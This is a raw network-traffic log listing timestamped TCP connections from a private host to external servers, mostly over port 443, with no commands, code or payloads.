                                                                                        Nov 30, 2024 12:48:09.128494978 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.128571033 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.128626108 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.128823996 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.128834963 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.128844023 CET49771443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.128848076 CET4434977113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.131593943 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.131628990 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.131715059 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.131858110 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.131872892 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.198299885 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.198357105 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.198487043 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.198648930 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.198698997 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.198731899 CET49773443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.198749065 CET4434977313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.201185942 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.201195955 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.201272011 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.201406956 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.201417923 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.250498056 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.250546932 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.250592947 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.250705004 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.250721931 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.250740051 CET49774443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.250745058 CET4434977413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.252808094 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.252818108 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.252877951 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.253051043 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.253062010 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.374892950 CET4972480192.168.2.4199.232.214.172
                                                                                        Nov 30, 2024 12:48:09.416162014 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.416209936 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.416263103 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.416490078 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.416490078 CET49775443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.416512966 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.416533947 CET4434977513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.419550896 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.419585943 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.419672012 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.419830084 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:09.419871092 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.495379925 CET8049724199.232.214.172192.168.2.4
                                                                                        Nov 30, 2024 12:48:09.495445013 CET4972480192.168.2.4199.232.214.172
                                                                                        Nov 30, 2024 12:48:10.907038927 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:10.910496950 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:10.910518885 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:10.910993099 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:10.910999060 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:10.978374958 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:10.982315063 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:10.982346058 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:10.982692957 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:10.982697010 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.032212019 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.034485102 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.034492970 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.034919977 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.034924030 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.047352076 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.047684908 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.047700882 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.048136950 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.048141003 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.265026093 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.265435934 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.265490055 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.265825987 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.265839100 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.348987103 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:11.349047899 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.349132061 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:11.349880934 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:11.349898100 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.362838030 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.362911940 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.363002062 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.363343954 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.363358021 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.363365889 CET49776443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.363370895 CET4434977613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.367768049 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.367830038 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.367923021 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.368079901 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.368109941 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.432487965 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.432559013 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.432620049 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.432761908 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.432776928 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.432786942 CET49777443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.432790995 CET4434977713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.435233116 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.435271025 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.435342073 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.435455084 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.435467005 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.476361036 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.476408005 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.476476908 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.476623058 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.476629019 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.476641893 CET49779443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.476644993 CET4434977913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.478544950 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.478569984 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.479033947 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.479182005 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.479195118 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.501025915 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.501071930 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.501128912 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.501324892 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.501332045 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.501339912 CET49778443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.501343012 CET4434977813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.503247023 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.503269911 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.503333092 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.503444910 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.503460884 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.721525908 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.721570015 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.721635103 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.721879959 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.721910000 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.721934080 CET49780443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.721947908 CET4434978013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.724715948 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.724729061 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:11.724808931 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.724967003 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:11.724977970 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.136338949 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.136678934 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:13.136698961 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.137022972 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.137331009 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:13.137397051 CET44349781142.250.181.100192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.146742105 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.147284985 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.147337914 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.147788048 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.147803068 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.187583923 CET49781443192.168.2.4142.250.181.100
                                                                                        Nov 30, 2024 12:48:13.224584103 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.225024939 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.225047112 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.225447893 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.225452900 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.261482954 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.261826038 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.261840105 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.262198925 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.262204885 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.283413887 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.283760071 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.283772945 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.284146070 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.284152031 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.441612959 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.442100048 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.442112923 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.442600965 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.442605019 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.591583967 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.591648102 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.591713905 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.591901064 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.591948032 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.591978073 CET49782443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.591995955 CET4434978213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.595069885 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.595103025 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.595169067 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.595338106 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.595350981 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.667402983 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.667473078 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.667624950 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.667656898 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.667656898 CET49783443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.667671919 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.667680979 CET4434978313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.669666052 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.669696093 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.669771910 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.669898033 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.669913054 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.728100061 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.728151083 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.728202105 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.728413105 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.728413105 CET49785443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.728421926 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.728430986 CET4434978513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.730252028 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.730282068 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.730355978 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.730467081 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.730479956 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.739593029 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.739636898 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.739691019 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.739813089 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.739824057 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.739831924 CET49784443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.739835978 CET4434978413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.741652966 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.741662025 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.741719007 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.741849899 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.741862059 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.877468109 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.877511978 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.877583981 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.877744913 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.877752066 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.877760887 CET49786443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.877763987 CET4434978613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.880122900 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.880160093 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:13.880232096 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.880506992 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:13.880518913 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.446007967 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.446659088 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.446681023 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.447119951 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.447124004 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.526245117 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.530788898 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.530817986 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.532124996 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.532130957 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.574712038 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.575486898 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.575515032 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.575828075 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.575834036 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.585757971 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.586030960 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.586042881 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.586457014 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.586460114 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.734193087 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.734671116 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.734694958 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.735140085 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.735145092 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.899658918 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.899720907 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.899976969 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.900011063 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.900027990 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.900038004 CET49787443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.900043011 CET4434978713.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.903070927 CET49792443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.903095961 CET4434979213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.903177023 CET49792443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.903345108 CET49792443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.903357983 CET4434979213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.979481936 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.979561090 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.979739904 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.979764938 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.979775906 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.979785919 CET49788443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.979790926 CET4434978813.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.982199907 CET49793443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.982224941 CET4434979313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:15.982301950 CET49793443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.982435942 CET49793443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:15.982446909 CET4434979313.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.028740883 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.028790951 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.028950930 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.029109001 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.029125929 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.029139042 CET49789443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.029145002 CET4434978913.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.031378984 CET49794443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.031389952 CET4434979413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.031470060 CET49794443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.031672955 CET49794443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.031683922 CET4434979413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.040270090 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.040317059 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.040441990 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.040471077 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.040476084 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.040483952 CET49790443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.040487051 CET4434979013.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.042351961 CET49795443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.042366982 CET4434979513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.042423964 CET49795443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.042530060 CET49795443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.042547941 CET4434979513.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.188425064 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.188474894 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.188592911 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.188858032 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.188874006 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.188894987 CET49791443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.188901901 CET4434979113.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.192173004 CET49796443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.192188978 CET4434979613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:16.192251921 CET49796443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.192610025 CET49796443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:16.192620039 CET4434979613.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.684576035 CET4434979213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.685128927 CET49792443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:17.685158014 CET4434979213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.685767889 CET49792443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:17.685774088 CET4434979213.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.751003981 CET4434979413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.751451969 CET49794443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:17.751466036 CET4434979413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.751786947 CET49794443192.168.2.413.107.246.63
                                                                                        Nov 30, 2024 12:48:17.751791954 CET4434979413.107.246.63192.168.2.4
                                                                                        Nov 30, 2024 12:48:17.825412035 CET4434979513.107.246.63192.168.2.4
